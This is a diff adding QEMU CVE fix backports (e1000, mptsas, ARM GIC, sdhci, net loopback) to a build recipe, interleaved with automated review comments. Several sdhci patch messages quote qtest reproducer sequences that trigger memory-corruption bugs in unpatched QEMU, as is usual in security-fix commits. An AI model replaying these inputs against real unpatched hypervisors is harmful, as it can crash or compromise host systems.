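+unaffected, and which is also the correct choice for performance.)
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2021-20221
+Fixes: 9ee6e8bb853 ("ARMv7 support.")
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913916
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913917
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Message-id: 20210131103401.217160-1-f4bug@amsat.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2021-20221
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/intc/arm_gic.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+Index: qemu-4.2.0/hw/intc/arm_gic.c
+===================================================================
+--- qemu-4.2.0.orig/hw/intc/arm_gic.c
++++ qemu-4.2.0/hw/intc/arm_gic.c
+@@ -1455,7 +1455,7 @@ static void gic_dist_writel(void *opaque
+ int target_cpu;
+
+ cpu = gic_get_current_cpu(s);
+- irq = value & 0x3ff;
++ irq = value & 0xf;
+ switch ((value >> 24) & 3) {
+ case 0:
+ mask = (value >> 16) & ALL_CPU_MASK;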
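Review bot: The new mask in gic_dist_writel(), `irq = value & 0xf;`, is a bare constant whose meaning is explained only in the patch header. A short comment on that line, e.g. `/* SGIINTID is GICD_SGIR bits [3:0]: SGI IDs 0-15 */`, would keep the field width from being widened again by mistake, since `irq` is later used as an array index according to the sanitizer output quoted in the description. The header's `Upstream-Status: Backport` has no upstream commit reference; the hash on the `From` line could be repeated there. The function starts and ends outside the hunk.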
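--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20257.patch
@@ -0,0 +1,55 @@
+From affdf476543405045c281a7c67d1eaedbcea8135 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 13:45:28 +0800
+Subject: [PATCH] e1000: fail early for evil descriptor
+
+During procss_tx_desc(), driver can try to chain data descriptor with
+legacy descriptor, when will lead underflow for the following
+calculation in process_tx_desc() for bytes:
+
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+This will lead a infinite loop. So check and fail early if tp->size if
+greater or equal to msh.
+
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Reported-by: Ruhr-University Bochum <bugs-syssec@rub.de>
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [3de46e6fc489c52c9431a8a832ad8170a7569bd8]
+CVE: CVE-2021-20257
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/net/e1000.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/net/e1000.c b/hw/net/e1000.c
+index cf22c4f07..c3564c7ce 100644
+--- a/hw/net/e1000.c
++++ b/hw/net/e1000.c
+@@ -670,6 +670,9 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ msh = tp->tso_props.hdr_len + tp->tso_props.mss;
+ do {
+ bytes = split_size;
++ if (tp->size >= msh) {
++ goto eop;
++ }
+ if (tp->size + bytes > msh)
+ bytes = msh - tp->size;
+
+@@ -695,6 +698,7 @@ process_tx_desc(E1000State *s, struct e1000_tx_desc *dp)
+ tp->size += split_size;
+ }
+
++eop:
+ if (!(txd_lower & E1000_TXD_CMD_EOP))
+ return;
+ if (!(tp->cptse && tp->size < tp->tso_props.hdr_len)) {
+--
+2.29.2
+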
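Review bot: The new `if (tp->size >= msh) { goto eop; }` in process_tx_desc() leaves the segmentation loop without any trace or guest-error message, so a descriptor chain rejected here is invisible when debugging a guest driver. A comment on the guard, e.g. `/* tp->size >= msh would make msh - tp->size wrap below; stop segmenting */`, together with a trace point, would put the reason in the code rather than only in the patch header. process_tx_desc() extends beyond both hunks, so whether the transmit state left at the jump is what the code after `eop:` expects should be checked against the full function.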
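--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3392.patch
@@ -0,0 +1,92 @@
+From 3791642c8d60029adf9b00bcb4e34d7d8a1aea4d Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 19 Apr 2021 15:42:47 +0200
+Subject: [PATCH] mptsas: Remove unused MPTSASState 'pending' field
+ (CVE-2021-3392)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+While processing SCSI i/o requests in mptsas_process_scsi_io_request(),
+the Megaraid emulator appends new MPTSASRequest object 'req' to
+the 's->pending' queue. In case of an error, this same object gets
+dequeued in mptsas_free_request() only if SCSIRequest object
+'req->sreq' is initialised. This may lead to a use-after-free issue.
+
+Since s->pending is actually not used, simply remove it from
+MPTSASState.
+
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+Message-id: 20210419134247.1467982-1-f4bug@amsat.org
+Message-Id: <20210416102243.1293871-1-mjt@msgid.tls.msk.ru>
+Suggested-by: Paolo Bonzini <pbonzini@redhat.com>
+Reported-by: Cheolwoo Myung <cwmyung@snu.ac.kr>
+BugLink: https://bugs.launchpad.net/qemu/+bug/1914236 (CVE-2021-3392)
+Fixes: e351b826112 ("hw: Add support for LSI SAS1068 (mptsas) device")
+[PMD: Reworded description, added more tags]
+Signed-off-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport [ https://git.qemu.org/?p=qemu.git;a=commit;h=3791642c8d60029adf9b00bcb4e34d7d8a1aea4d ]
+CVE: CVE-2021-3392
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/mptsas.c | 6 ------
+ hw/scsi/mptsas.h | 1 -
+ 2 files changed, 7 deletions(-)
+
+diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
+index 7416e78..db3219e 100644
+--- a/hw/scsi/mptsas.c
++++ b/hw/scsi/mptsas.c
+@@ -251,13 +251,10 @@ static int mptsas_build_sgl(MPTSASState *s, MPTSASRequest *req, hwaddr addr)
+
+ static void mptsas_free_request(MPTSASRequest *req)
+ {
+- MPTSASState *s = req->dev;
+-
+ if (req->sreq != NULL) {
+ req->sreq->hba_private = NULL;
+ scsi_req_unref(req->sreq);
+ req->sreq = NULL;
+- QTAILQ_REMOVE(&s->pending, req, next);
+ }
+ qemu_sglist_destroy(&req->qsg);
+ g_free(req);
+@@ -303,7 +300,6 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
+ }
+
+ req = g_new0(MPTSASRequest, 1);
+- QTAILQ_INSERT_TAIL(&s->pending, req, next);
+ req->scsi_io = *scsi_io;
+ req->dev = s;
+
+@@ -1319,8 +1315,6 @@ static void mptsas_scsi_realize(PCIDevice *dev, Error **errp)
+
+ s->request_bh = qemu_bh_new(mptsas_fetch_requests, s);
+
+- QTAILQ_INIT(&s->pending);
+-
+ scsi_bus_new(&s->bus, sizeof(s->bus), &dev->qdev, &mptsas_scsi_info, NULL);
+ }
+
+diff --git a/hw/scsi/mptsas.h b/hw/scsi/mptsas.h
+index b85ac1a..c046497 100644
+--- a/hw/scsi/mptsas.h
++++ b/hw/scsi/mptsas.h
+@@ -79,7 +79,6 @@ struct MPTSASState {
+ uint16_t reply_frame_size;
+
+ SCSIBus bus;
+- QTAILQ_HEAD(, MPTSASRequest) pending;
+ };
+
+ void mptsas_fix_scsi_io_endianness(MPIMsgSCSIIORequest *req);
+--
+1.8.3.1
+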
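--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-1.patch
@@ -0,0 +1,85 @@
+From b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:35 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't transfer any data when command time out
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+At the end of sdhci_send_command(), it starts a data transfer if the
+command register indicates data is associated. But the data transfer
+should only be initiated when the command execution has succeeded.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001810
+outl 0xcfc 0xe1068000
+outl 0xcf8 0x80001804
+outw 0xcfc 0x7
+write 0xe106802c 0x1 0x0f
+write 0xe1068004 0xc 0x2801d10101fffffbff28a384
+write 0xe106800c 0x1f 0x9dacbbcad9e8f7061524334251606f7e8d9cabbac9d8e7f60514233241505f
+write 0xe1068003 0x28 0x80d000251480d000252280d000253080d000253e80d000254c80d000255a80d000256880d0002576
+write 0xe1068003 0x1 0xfe
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -M pc-q35-5.0 \
+ -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive \
+ -monitor none -serial none -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Acked-by: Alistair Francis <alistair.francis@wdc.com>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Tested-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-2-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-1.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b263d8f928001b5cfa2a993ea43b7a5b3a1811e8 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -316,6 +316,7 @@ static void sdhci_send_command(SDHCIStat
+ SDRequest request;
+ uint8_t response[16];
+ int rlen;
++ bool timeout = false;
+
+ s->errintsts = 0;
+ s->acmd12errsts = 0;
+@@ -339,6 +340,7 @@ static void sdhci_send_command(SDHCIStat
+ trace_sdhci_response16(s->rspreg[3], s->rspreg[2],
+ s->rspreg[1], s->rspreg[0]);
+ } else {
++ timeout = true;
+ trace_sdhci_error("timeout waiting for command response");
+ if (s->errintstsen & SDHC_EISEN_CMDTIMEOUT) {
+ s->errintsts |= SDHC_EIS_CMDTIMEOUT;
+@@ -359,7 +361,7 @@ static void sdhci_send_command(SDHCIStat
+
+ sdhci_update_irq(s);
+
+- if (s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
++ if (!timeout && s->blksize && (s->cmdreg & SDHC_CMD_DATA_PRESENT)) {
+ s->data_count = 0;
+ sdhci_data_transfer(s);
+ }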
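Review bot: The patch header lists `Fixes: CVE-2020-25085`, but the recipe-facing tag reads `CVE: CVE-2021-3409 CVE-2020-17380`, so CVE tracking driven by the `CVE:` line would not credit this patch for CVE-2020-25085; the same header is repeated in CVE-2021-3409-2.patch and CVE-2021-3409-3.patch. If that CVE is not already covered by another patch in the recipe, add it to the `CVE:` line in all three. In the code, `timeout` is set only in the else branch of the second hunk; a comment on the final condition, e.g. `/* no data phase if the command itself timed out */`, would make the new `!timeout` test self-explanatory. sdhci_send_command() starts and ends outside the hunks.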
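--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-2.patch
@@ -0,0 +1,103 @@
+From 8be45cc947832b3c02144c9d52921f499f2d77fe Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:36 +0800
+Subject: [PATCH] hw/sd: sdhci: Don't write to SDHC_SYSAD register when
+ transfer is in progress
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Per "SD Host Controller Standard Specification Version 7.00"
+chapter 2.2.1 SDMA System Address Register:
+
+This register can be accessed only if no transaction is executing
+(i.e., after a transaction has stopped).
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xfbefff00
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xfbefff2c 0x1 0x05
+write 0xfbefff0f 0x1 0x37
+write 0xfbefff0a 0x1 0x01
+write 0xfbefff0f 0x1 0x29
+write 0xfbefff0f 0x1 0x02
+write 0xfbefff0f 0x1 0x03
+write 0xfbefff04 0x1 0x01
+write 0xfbefff05 0x1 0x01
+write 0xfbefff07 0x1 0x02
+write 0xfbefff0c 0x1 0x33
+write 0xfbefff0e 0x1 0x20
+write 0xfbefff0f 0x1 0x00
+write 0xfbefff2a 0x1 0x01
+write 0xfbefff0c 0x1 0x00
+write 0xfbefff03 0x1 0x00
+write 0xfbefff05 0x1 0x00
+write 0xfbefff2a 0x1 0x02
+write 0xfbefff0c 0x1 0x32
+write 0xfbefff01 0x1 0x01
+write 0xfbefff02 0x1 0x01
+write 0xfbefff03 0x1 0x01
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-3-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-2.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/8be45cc947832b3c02144c9d52921f499f2d77fe ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1117,15 +1117,17 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ switch (offset & ~0x3) {
+ case SDHC_SYSAD:
+- s->sdmasysad = (s->sdmasysad & mask) | value;
+- MASKED_WRITE(s->sdmasysad, mask, value);
+- /* Writing to last byte of sdmasysad might trigger transfer */
+- if (!(mask & 0xFF000000) && TRANSFERRING_DATA(s->prnsts) && s->blkcnt &&
+- s->blksize && SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
+- if (s->trnmod & SDHC_TRNS_MULTI) {
+- sdhci_sdma_transfer_multi_blocks(s);
+- } else {
+- sdhci_sdma_transfer_single_block(s);
++ if (!TRANSFERRING_DATA(s->prnsts)) {
++ s->sdmasysad = (s->sdmasysad & mask) | value;
++ MASKED_WRITE(s->sdmasysad, mask, value);
++ /* Writing to last byte of sdmasysad might trigger transfer */
++ if (!(mask & 0xFF000000) && s->blkcnt && s->blksize &&
++ SDHC_DMA_TYPE(s->hostctl1) == SDHC_CTRL_SDMA) {
++ if (s->trnmod & SDHC_TRNS_MULTI) {
++ sdhci_sdma_transfer_multi_blocks(s);
++ } else {
++ sdhci_sdma_transfer_single_block(s);
++ }
+ }
+ }
+ break;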
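Review bot: Inside the new `if (!TRANSFERRING_DATA(s->prnsts))` block in sdhci_write(), the register is stored twice, once by `s->sdmasysad = (s->sdmasysad & mask) | value;` and again by `MASKED_WRITE(s->sdmasysad, mask, value);`. The removed lines show the pair was already there, but if MASKED_WRITE expands to the same expression (its definition is not on this page) the second store is redundant and the backport could keep only one. A write to SDHC_SYSAD that arrives while a transfer is in progress is now dropped without any trace; an else branch with a guest-error log would make a misbehaving guest driver visible. The switch statement continues outside the hunk.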
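--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-3.patch
@@ -0,0 +1,71 @@
+Backport of:
+
+From bc6f28995ff88f5d82c38afcfd65406f0ae375aa Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:37 +0800
+Subject: [PATCH] hw/sd: sdhci: Correctly set the controller status for ADMA
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When an ADMA transfer is started, the codes forget to set the
+controller status to indicate a transfer is in progress.
+
+With this fix, the following 2 reproducers:
+
+https://paste.debian.net/plain/1185136
+https://paste.debian.net/plain/1185141
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-4-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/bc6f28995ff88f5d82c38afcfd65406f0ae375aa ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 3 +++
+ 1 file changed, 3 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -776,8 +776,9 @@ static void sdhci_do_adma(SDHCIState *s)
+
+ switch (dscr.attr & SDHC_ADMA_ATTR_ACT_MASK) {
+ case SDHC_ADMA_ATTR_ACT_TRAN: /* data transfer */
+-
++ s->prnsts |= SDHC_DATA_INHIBIT | SDHC_DAT_LINE_ACTIVE;
+ if (s->trnmod & SDHC_TRNS_READ) {
++ s->prnsts |= SDHC_DOING_READ;
+ while (length) {
+ if (s->data_count == 0) {
+ for (n = 0; n < block_size; n++) {
+@@ -807,6 +808,7 @@ static void sdhci_do_adma(SDHCIState *s)
+ }
+ }
+ } else {
++ s->prnsts |= SDHC_DOING_WRITE;
+ while (length) {
+ begin = s->data_count;
+ if ((length + begin) < block_size) {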
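Review bot: The `CVE:` tag in this patch header lists only CVE-2021-3409 and CVE-2020-17380, while the upstream message it carries also has `Fixes: CVE-2020-25085`; the same holds for CVE-2021-3409-5.patch. Unless another patch in the recipe already carries that id, the tag should read `CVE: CVE-2021-3409 CVE-2020-17380 CVE-2020-25085`, so that CVE checking keyed on this tag reports it as patched. In the code, the hunks only show `s->prnsts` bits being set in the `SDHC_ADMA_ATTR_ACT_TRAN` case, and sdhci_do_adma continues outside them. It is worth confirming the bits are cleared on every exit from the transfer, because the `!TRANSFERRING_DATA(s->prnsts)` guards used elsewhere in this series would otherwise keep rejecting guest register writes.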
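--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-4.patch
@@ -0,0 +1,52 @@
+Backport of:
+
+From 5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:38 +0800
+Subject: [PATCH] hw/sd: sdhci: Limit block size only when SDHC_BLKSIZE
+ register is writable
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+The codes to limit the maximum block size is only necessary when
+SDHC_BLKSIZE register is writable.
+
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-5-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/5cd7aa3451b76bb19c0f6adc2b931f091e5d7fcd ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 14 +++++++-------
+ 1 file changed, 7 insertions(+), 7 deletions(-)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1137,15 +1137,15 @@ sdhci_write(void *opaque, hwaddr offset,
+ if (!TRANSFERRING_DATA(s->prnsts)) {
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+- }
+
+- /* Limit block size to the maximum buffer size */
+- if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
+- qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than " \
+- "the maximum buffer 0x%x", __func__, s->blksize,
+- s->buf_maxsz);
++ /* Limit block size to the maximum buffer size */
++ if (extract32(s->blksize, 0, 12) > s->buf_maxsz) {
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: Size 0x%x is larger than "
++ "the maximum buffer 0x%x\n", __func__, s->blksize,
++ s->buf_maxsz);
+
+- s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
++ }
+ }
+
+ break;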
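--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3409-5.patch
@@ -0,0 +1,93 @@
+From cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 Mon Sep 17 00:00:00 2001
+From: Bin Meng <bmeng.cn@gmail.com>
+Date: Wed, 3 Mar 2021 20:26:39 +0800
+Subject: [PATCH] hw/sd: sdhci: Reset the data pointer of s->fifo_buffer[] when
+ a different block size is programmed
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+If the block size is programmed to a different value from the
+previous one, reset the data pointer of s->fifo_buffer[] so that
+s->fifo_buffer[] can be filled in using the new block size in
+the next transfer.
+
+With this fix, the following reproducer:
+
+outl 0xcf8 0x80001010
+outl 0xcfc 0xe0000000
+outl 0xcf8 0x80001001
+outl 0xcfc 0x06000000
+write 0xe000002c 0x1 0x05
+write 0xe0000005 0x1 0x02
+write 0xe0000007 0x1 0x01
+write 0xe0000028 0x1 0x10
+write 0x0 0x1 0x23
+write 0x2 0x1 0x08
+write 0xe000000c 0x1 0x01
+write 0xe000000e 0x1 0x20
+write 0xe000000f 0x1 0x00
+write 0xe000000c 0x1 0x32
+write 0xe0000004 0x2 0x0200
+write 0xe0000028 0x1 0x00
+write 0xe0000003 0x1 0x40
+
+cannot be reproduced with the following QEMU command line:
+
+$ qemu-system-x86_64 -nographic -machine accel=qtest -m 512M \
+ -nodefaults -device sdhci-pci,sd-spec-version=3 \
+ -drive if=sd,index=0,file=null-co://,format=raw,id=mydrive \
+ -device sd-card,drive=mydrive -qtest stdio
+
+Cc: qemu-stable@nongnu.org
+Fixes: CVE-2020-17380
+Fixes: CVE-2020-25085
+Fixes: CVE-2021-3409
+Fixes: d7dfca0807a0 ("hw/sdhci: introduce standard SD host controller")
+Reported-by: Alexander Bulekov <alxndr@bu.edu>
+Reported-by: Cornelius Aschermann (Ruhr-Universität Bochum)
+Reported-by: Sergej Schumilo (Ruhr-Universität Bochum)
+Reported-by: Simon Wörner (Ruhr-Universität Bochum)
+Buglink: https://bugs.launchpad.net/qemu/+bug/1892960
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909418
+Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1928146
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Signed-off-by: Bin Meng <bmeng.cn@gmail.com>
+Message-Id: <20210303122639.20004-6-bmeng.cn@gmail.com>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+
+CVE: CVE-2021-3409 CVE-2020-17380
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2021-3409-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/cffb446e8fd19a14e1634c7a3a8b07be3f01d5c9 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/sd/sdhci.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+--- a/hw/sd/sdhci.c
++++ b/hw/sd/sdhci.c
+@@ -1135,6 +1135,8 @@ sdhci_write(void *opaque, hwaddr offset,
+ break;
+ case SDHC_BLKSIZE:
+ if (!TRANSFERRING_DATA(s->prnsts)) {
++ uint16_t blksize = s->blksize;
++
+ MASKED_WRITE(s->blksize, mask, extract32(value, 0, 12));
+ MASKED_WRITE(s->blkcnt, mask >> 16, value >> 16);
+
+@@ -1146,6 +1148,16 @@ sdhci_write(void *opaque, hwaddr offset,
+
+ s->blksize = deposit32(s->blksize, 0, 12, s->buf_maxsz);
+ }
++
++ /*
++ * If the block size is programmed to a different value from
++ * the previous one, reset the data pointer of s->fifo_buffer[]
++ * so that s->fifo_buffer[] can be filled in using the new block
++ * size in the next transfer.
++ */
++ if (blksize != s->blksize) {
++ s->data_count = 0;
++ }
+ }
+
+ break;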
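--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-3416_1.patch
@@ -0,0 +1,177 @@
+From 4b1988a29d67277d6c8ce1df52975f5616592913 Mon Sep 17 00:00:00 2001
+From: Jason Wang <jasowang@redhat.com>
+Date: Wed, 24 Feb 2021 11:44:36 +0800
+Subject: [PATCH 01/10] net: introduce qemu_receive_packet()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some NIC supports loopback mode and this is done by calling
+nc->info->receive() directly which in fact suppresses the effort of
+reentrancy check that is done in qemu_net_queue_send().
+
+Unfortunately we can't use qemu_net_queue_send() here since for
+loopback there's no sender as peer, so this patch introduce a
+qemu_receive_packet() which is used for implementing loopback mode
+for a NIC with this check.
+
+NIC that supports loopback mode will be converted to this helper.
+
+This is intended to address CVE-2021-3416.
+
+Cc: Prasad J Pandit <ppandit@redhat.com>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Cc: qemu-stable@nongnu.org
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport [705df5466c98f3efdd2b68d3b31dad86858acad7]
+CVE: CVE-2021-3416
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ include/net/net.h | 5 +++++
+ include/net/queue.h | 8 ++++++++
+ net/net.c | 38 +++++++++++++++++++++++++++++++-------
+ net/queue.c | 22 ++++++++++++++++++++++
+ 4 files changed, 66 insertions(+), 7 deletions(-)
+
+diff --git a/include/net/net.h b/include/net/net.h
+index 778fc787c..03f058ecb 100644
+--- a/include/net/net.h
++++ b/include/net/net.h
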